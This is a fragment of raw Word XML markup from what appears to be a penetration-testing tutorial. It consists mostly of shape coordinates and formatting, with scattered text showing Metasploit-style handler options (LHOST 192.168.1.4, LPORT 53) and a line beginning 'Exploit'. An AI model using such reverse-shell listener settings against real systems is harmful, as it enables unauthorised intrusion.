        <v:shape style="position:absolute;left:4090;top:5190;width:130;height:270" coordorigin="4090,5190" coordsize="130,270" path="m4106,5217l4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4106,5217,4107,5217,4107,5217,4107,5217,4107,5217,4107,5217,4107,5217,4107,5217,4107,5217,4107,5217,4108,5217,4108,5217,4108,5217,4108,5217,4108,5217,4109,5217,4109,5217,4109,5217,4109,5217,4110,5217,4110,5217,4110,5217,4111,5217,4111,5217,4111,5217,4112,5217,4112,5217,4113,5217,4113,5217,4113,5217,4114,5217,4114,5217,4115,5217,4116,5217,4116,5217,4117,5217,4117,5217,4118,5217,4119,5217,4119,5217,4120,5217,4121,5217,4121,5217,4122,5217,4123,5217,4124,5217,4125,5217,4126,5217,4127,5217,4127,5217,4128,5217,4129,5217,4131,5217,4132,5217,4133,5217,4134,5217,4135,5217,4136,5217,4137,5217,4139,5217,4140,5217,4141,5217,4143,5217,4144,5217,4145,5217,4147,5217,4148,5217,4150,5217,4151,5217,4153,5217,4155,5217,4156,5217,4158,5217,4160,5217,4162,5217,4163,5217,4165,5217,4167,5217,4169,5217,4171,5217,4173,5217,4175,5217,4177,5217,4179,5217,4182,5217,4184,5217,4186,5217,4189,5217,4191,5217,4193,5217,4196,5217,4198,5217,4201,5217,4204,5217,4206,5217,4209,5217,4212,5217,4214,5217,4217,5217,4220,5217,4223,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5217,4226,5218,4226,5218,4226,5218,4226,5218,4226,5218,4226,5218,4226,5219,4226,5219,4226,5219,4226,5220,4226,5220,4226,5220,4226,5221,4226,5221,4226,5222,4226,5222,4226,5223,4226,5223,4226,5224,4226,5224,4226,5225,4226,5226,4226,5226,4226,5227,4226,5228,4226,5229,4226,5230,4226,5230,4226,5231,4226,5232,4226,5233,4226,5234,4226,5236,4226,5237,4226,5238,4226,5239,4226,5240,4226,5242,4226,5243,4226,5245,4226,5246,4226,5248,4226,5249,4226,5251,4226,5253,4226,5254,4226,5256,4226,5258,4226,5260,4226,5262,4226,5264,4226,5266,4226,5269,4226,5271,4226,5273,4226,5276,4226,5278,4226,5280,4226,5283,4226,5286,4226,5288,4226,5291,4226,5294,4226,5297,4226,5300,4226,5303,4226,5306,4226,5310,4226,5313,4226,5316,4226,5320,4226,5323,4226,5327,4226,5331,4226,5335,4226,5338,4226,5342,4226,5346,4226,5351,4226,5355,4226,5359,4226,5364,4226,5368,4226,5373,4226,5377,4226,5382,4226,5387,4226,5392,4226,5397,4226,5402,4226,5407,4226,5413,4226,5418,4226,5424,4226,5429,4226,5435,4226,5441,4226,5447,4226,5453,4226,5459,4226,5465,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4226,5472,4225,5472,4225,5472,4225,5472,4225,5472,4225,5472,4225,5472,4225,5472,4225,5472,4224,5472,4224,5472,4224,5472,4224,5472,4224,5472,4223,5472,4223,5472,4223,5472,4223,5472,4222,5472,4222,5472,4222,5472,4221,5472,4221,5472,4220,5472,4220,5472,4220,5472,4219,5472,4219,5472,4218,5472,4218,5472,4217,5472,4217,5472,4216,5472,4216,5472,4215,5472,4214,5472,4214,5472,4213,5472,4212,5472,4211,5472,4211,5472,4210,5472,4209,5472,4208,5472,4207,5472,4207,5472,4206,5472,4205,5472,4204,5472,4203,5472,4202,5472,4201,5472,4200,5472,4198,5472,4197,5472,4196,5472,4195,5472,4194,5472,4192,5472,4191,5472,4190,5472,4188,5472,4187,5472,4185,5472,4184,5472,4182,5472,4181,5472,4179,5472,4178,5472,4176,5472,4174,5472,4172,5472,4171,5472,4169,5472,4167,5472,4165,5472,4163,5472,4161,5472,4159,5472,4157,5472,4155,5472,4153,5472,4151,5472,4148,5472,4146,5472,4144,5472,4141,5472,4139,5472,4136,5472,4134,5472,4131,5472,4129,5472,4126,5472,4123,5472,4121,5472,4118,5472,4115,5472,4112,5472,4109,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5472,4106,5471,4106,5471,4106,5471,4106,5471,4106,5471,4106,5471,4106,5471,4106,5471,4106,5471,4106,5470,4106,5470,4106,5470,4106,5470,4106,5469,4106,5469,4106,5469,4106,5468,4106,5468,4106,5468,4106,5467,4106,5467,4106,5466,4106,5466,4106,5465,4106,5465,4106,5464,4106,5463,4106,5463,4106,5462,4106,5461,4106,5461,4106,5460,4106,5459,4106,5458,4106,5457,4106,5456,4106,5455,4106,5454,4106,5453,4106,5452,4106,5450,4106,5449,4106,5448,4106,5447,4106,5445,4106,5444,4106,5442,4106,5441,4106,5439,4106,5437,4106,5436,4106,5434,4106,5432,4106,5430,4106,5428,4106,5426,4106,5424,4106,5422,4106,5420,4106,5418,4106,5415,4106,5413,4106,5410,4106,5408,4106,5405,4106,5403,4106,5400,4106,5397,4106,5394,4106,5391,4106,5388,4106,5385,4106,5382,4106,5379,4106,5375,4106,5372,4106,5369,4106,5365,4106,5361,4106,5358,4106,5354,4106,5350,4106,5346,4106,5342,4106,5338,4106,5334,4106,5329,4106,5325,4106,5320,4106,5316,4106,5311,4106,5306,4106,5301,4106,5296,4106,5291,4106,5286,4106,5281,4106,5276,4106,5270,4106,5265,4106,5259,4106,5253,4106,5247,4106,5241,4106,5235,4106,5229,4106,5223,4106,5217e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:264.500pt;margin-top:259.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5290,5190" coordsize="130,270">
        <v:shape style="position:absolute;left:5290;top:5190;width:130;height:270" coordorigin="5290,5190" coordsize="130,270" path="m5307,5217l5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5307,5217,5308,5217,5308,5217,5308,5217,5308,5217,5308,5217,5308,5217,5308,5217,5309,5217,5309,5217,5309,5217,5309,5217,5309,5217,5310,5217,5310,5217,5310,5217,5311,5217,5311,5217,5311,5217,5312,5217,5312,5217,5312,5217,5313,5217,5313,5217,5314,5217,5314,5217,5315,5217,5315,5217,5316,5217,5316,5217,5317,5217,5317,5217,5318,5217,5319,5217,5319,5217,5320,5217,5321,5217,5321,5217,5322,5217,5323,5217,5324,5217,5324,5217,5325,5217,5326,5217,5327,5217,5328,5217,5329,5217,5330,5217,5331,5217,5332,5217,5333,5217,5334,5217,5336,5217,5337,5217,5338,5217,5339,5217,5340,5217,5342,5217,5343,5217,5345,5217,5346,5217,5347,5217,5349,5217,5350,5217,5352,5217,5354,5217,5355,5217,5357,5217,5359,5217,5360,5217,5362,5217,5364,5217,5366,5217,5368,5217,5370,5217,5372,5217,5374,5217,5376,5217,5378,5217,5380,5217,5382,5217,5385,5217,5387,5217,5389,5217,5392,5217,5394,5217,5396,5217,5399,5217,5402,5217,5404,5217,5407,5217,5409,5217,5412,5217,5415,5217,5418,5217,5421,5217,5424,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5217,5427,5218,5427,5218,5427,5218,5427,5218,5427,5218,5427,5218,5427,5219,5427,5219,5427,5219,5427,5220,5427,5220,5427,5220,5427,5221,5427,5221,5427,5222,5427,5222,5427,5223,5427,5223,5427,5224,5427,5224,5427,5225,5427,5226,5427,5226,5427,5227,5427,5228,5427,5229,5427,5230,5427,5230,5427,5231,5427,5232,5427,5233,5427,5234,5427,5236,5427,5237,5427,5238,5427,5239,5427,5240,5427,5242,5427,5243,5427,5245,5427,5246,5427,5248,5427,5249,5427,5251,5427,5253,5427,5254,5427,5256,5427,5258,5427,5260,5427,5262,5427,5264,5427,5266,5427,5269,5427,5271,5427,5273,5427,5276,5427,5278,5427,5280,5427,5283,5427,5286,5427,5288,5427,5291,5427,5294,5427,5297,5427,5300,5427,5303,5427,5306,5427,5310,5427,5313,5427,5316,5427,5320,5427,5323,5427,5327,5427,5331,5427,5335,5427,5338,5427,5342,5427,5346,5427,5351,5427,5355,5427,5359,5427,5364,5427,5368,5427,5373,5427,5377,5427,5382,5427,5387,5427,5392,5427,5397,5427,5402,5427,5407,5427,5413,5427,5418,5427,5424,5427,5429,5427,5435,5427,5441,5427,5447,5427,5453,5427,5459,5427,5465,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5427,5472,5426,5472,5426,5472,5426,5472,5426,5472,5426,5472,5426,5472,5426,5472,5426,5472,5426,5472,5426,5472,5426,5472,5425,5472,5425,5472,5425,5472,5425,5472,5425,5472,5425,5472,5424,5472,5424,5472,5424,5472,5424,5472,5423,5472,5423,5472,5423,5472,5423,5472,5422,5472,5422,5472,5421,5472,5421,5472,5421,5472,5420,5472,5420,5472,5419,5472,5419,5472,5418,5472,5418,5472,5417,5472,5417,5472,5416,5472,5416,5472,5415,5472,5414,5472,5414,5472,5413,5472,5412,5472,5411,5472,5411,5472,5410,5472,5409,5472,5408,5472,5407,5472,5406,5472,5405,5472,5404,5472,5403,5472,5402,5472,5401,5472,5400,5472,5399,5472,5398,5472,5397,5472,5395,5472,5394,5472,5393,5472,5392,5472,5390,5472,5389,5472,5387,5472,5386,5472,5385,5472,5383,5472,5381,5472,5380,5472,5378,5472,5377,5472,5375,5472,5373,5472,5371,5472,5369,5472,5368,5472,5366,5472,5364,5472,5362,5472,5360,5472,5358,5472,5355,5472,5353,5472,5351,5472,5349,5472,5347,5472,5344,5472,5342,5472,5339,5472,5337,5472,5334,5472,5332,5472,5329,5472,5327,5472,5324,5472,5321,5472,5318,5472,5316,5472,5313,5472,5310,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5472,5307,5471,5307,5471,5307,5471,5307,5471,5307,5471,5307,5471,5307,5471,5307,5471,5307,5471,5307,5470,5307,5470,5307,5470,5307,5470,5307,5469,5307,5469,5307,5469,5307,5468,5307,5468,5307,5468,5307,5467,5307,5467,5307,5466,5307,5466,5307,5465,5307,5465,5307,5464,5307,5463,5307,5463,5307,5462,5307,5461,5307,5461,5307,5460,5307,5459,5307,5458,5307,5457,5307,5456,5307,5455,5307,5454,5307,5453,5307,5452,5307,5450,5307,5449,5307,5448,5307,5447,5307,5445,5307,5444,5307,5442,5307,5441,5307,5439,5307,5437,5307,5436,5307,5434,5307,5432,5307,5430,5307,5428,5307,5426,5307,5424,5307,5422,5307,5420,5307,5418,5307,5415,5307,5413,5307,5410,5307,5408,5307,5405,5307,5403,5307,5400,5307,5397,5307,5394,5307,5391,5307,5388,5307,5385,5307,5382,5307,5379,5307,5375,5307,5372,5307,5369,5307,5365,5307,5361,5307,5358,5307,5354,5307,5350,5307,5346,5307,5342,5307,5338,5307,5334,5307,5329,5307,5325,5307,5320,5307,5316,5307,5311,5307,5306,5307,5301,5307,5296,5307,5291,5307,5286,5307,5281,5307,5276,5307,5270,5307,5265,5307,5259,5307,5253,5307,5247,5307,5241,5307,5235,5307,5229,5307,5223,5307,5217e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:295.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,5910" coordsize="130,250">
        <v:shape style="position:absolute;left:2170;top:5910;width:130;height:250" coordorigin="2170,5910" coordsize="130,250" path="m2185,5922l2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2185,5922,2186,5922,2186,5922,2186,5922,2186,5922,2186,5922,2186,5922,2186,5922,2186,5922,2186,5922,2187,5922,2187,5922,2187,5922,2187,5922,2187,5922,2187,5922,2188,5922,2188,5922,2188,5922,2188,5922,2189,5922,2189,5922,2189,5922,2190,5922,2190,5922,2190,5922,2191,5922,2191,5922,2192,5922,2192,5922,2192,5922,2193,5922,2193,5922,2194,5922,2195,5922,2195,5922,2196,5922,2196,5922,2197,5922,2198,5922,2198,5922,2199,5922,2200,5922,2200,5922,2201,5922,2202,5922,2203,5922,2204,5922,2205,5922,2206,5922,2207,5922,2208,5922,2209,5922,2210,5922,2211,5922,2212,5922,2213,5922,2214,5922,2215,5922,2216,5922,2218,5922,2219,5922,2220,5922,2222,5922,2223,5922,2224,5922,2226,5922,2227,5922,2229,5922,2230,5922,2232,5922,2234,5922,2235,5922,2237,5922,2239,5922,2241,5922,2242,5922,2244,5922,2246,5922,2248,5922,2250,5922,2252,5922,2254,5922,2256,5922,2259,5922,2261,5922,2263,5922,2265,5922,2268,5922,2270,5922,2272,5922,2275,5922,2277,5922,2280,5922,2283,5922,2285,5922,2288,5922,2291,5922,2293,5922,2296,5922,2299,5922,2302,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5922,2305,5923,2305,5923,2305,5923,2305,5923,2305,5923,2305,5923,2305,5924,2305,5924,2305,5924,2305,5924,2305,5925,2305,5925,2305,5925,2305,5926,2305,5926,2305,5926,2305,5927,2305,5927,2305,5928,2305,5928,2305,5929,2305,5930,2305,5930,2305,5931,2305,5932,2305,5932,2305,5933,2305,5934,2305,5935,2305,5936,2305,5937,2305,5938,2305,5939,2305,5940,2305,5941,2305,5942,2305,5943,2305,5945,2305,5946,2305,5947,2305,5949,2305,5950,2305,5952,2305,5953,2305,5955,2305,5956,2305,5958,2305,5960,2305,5962,2305,5964,2305,5966,2305,5968,2305,5970,2305,5972,2305,5974,2305,5976,2305,5978,2305,5981,2305,5983,2305,5986,2305,5988,2305,5991,2305,5994,2305,5997,2305,5999,2305,6002,2305,6005,2305,6009,2305,6012,2305,6015,2305,6018,2305,6022,2305,6025,2305,6029,2305,6032,2305,6036,2305,6040,2305,6044,2305,6048,2305,6052,2305,6056,2305,6060,2305,6064,2305,6069,2305,6073,2305,6078,2305,6083,2305,6087,2305,6092,2305,6097,2305,6102,2305,6107,2305,6113,2305,6118,2305,6123,2305,6129,2305,6135,2305,6140,2305,6146,2305,6152,2305,6158,2305,6164,2305,6171,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2305,6177,2304,6177,2304,6177,2304,6177,2304,6177,2304,6177,2304,6177,2304,6177,2303,6177,2303,6177,2303,6177,2303,6177,2303,6177,2302,6177,2302,6177,2302,6177,2302,6177,2301,6177,2301,6177,2301,6177,2300,6177,2300,6177,2299,6177,2299,6177,2299,6177,2298,6177,2298,6177,2297,6177,2297,6177,2296,6177,2296,6177,2295,6177,2295,6177,2294,6177,2293,6177,2293,6177,2292,6177,2291,6177,2291,6177,2290,6177,2289,6177,2288,6177,2287,6177,2286,6177,2286,6177,2285,6177,2284,6177,2283,6177,2282,6177,2281,6177,2280,6177,2279,6177,2277,6177,2276,6177,2275,6177,2274,6177,2273,6177,2271,6177,2270,6177,2269,6177,2267,6177,2266,6177,2264,6177,2263,6177,2261,6177,2260,6177,2258,6177,2257,6177,2255,6177,2253,6177,2251,6177,2250,6177,2248,6177,2246,6177,2244,6177,2242,6177,2240,6177,2238,6177,2236,6177,2234,6177,2232,6177,2230,6177,2227,6177,2225,6177,2223,6177,2220,6177,2218,6177,2215,6177,2213,6177,2210,6177,2208,6177,2205,6177,2202,6177,2200,6177,2197,6177,2194,6177,2191,6177,2188,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6177,2185,6176,2185,6176,2185,6176,2185,6176,2185,6176,2185,6176,2185,6175,2185,6175,2185,6175,2185,6175,2185,6174,2185,6174,2185,6174,2185,6173,2185,6173,2185,6173,2185,6172,2185,6172,2185,6171,2185,6171,2185,6170,2185,6169,2185,6169,2185,6168,2185,6167,2185,6167,2185,6166,2185,6165,2185,6164,2185,6163,2185,6162,2185,6161,2185,6160,2185,6159,2185,6158,2185,6157,2185,6156,2185,6155,2185,6153,2185,6152,2185,6151,2185,6149,2185,6148,2185,6146,2185,6144,2185,6143,2185,6141,2185,6139,2185,6137,2185,6136,2185,6134,2185,6132,2185,6130,2185,6127,2185,6125,2185,6123,2185,6121,2185,6118,2185,6116,2185,6113,2185,6111,2185,6108,2185,6105,2185,6102,2185,6100,2185,6097,2185,6094,2185,6091,2185,6087,2185,6084,2185,6081,2185,6077,2185,6074,2185,6070,2185,6067,2185,6063,2185,6059,2185,6055,2185,6051,2185,6047,2185,6043,2185,6039,2185,6035,2185,6030,2185,6026,2185,6021,2185,6016,2185,6012,2185,6007,2185,6002,2185,5997,2185,5992,2185,5986,2185,5981,2185,5976,2185,5970,2185,5964,2185,5959,2185,5953,2185,5947,2185,5941,2185,5935,2185,5928,2185,5922e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:349.800pt;width:467.400pt;height:276.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr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86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35" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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specifi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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6261" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20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yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20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The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="19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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20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port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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7942" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
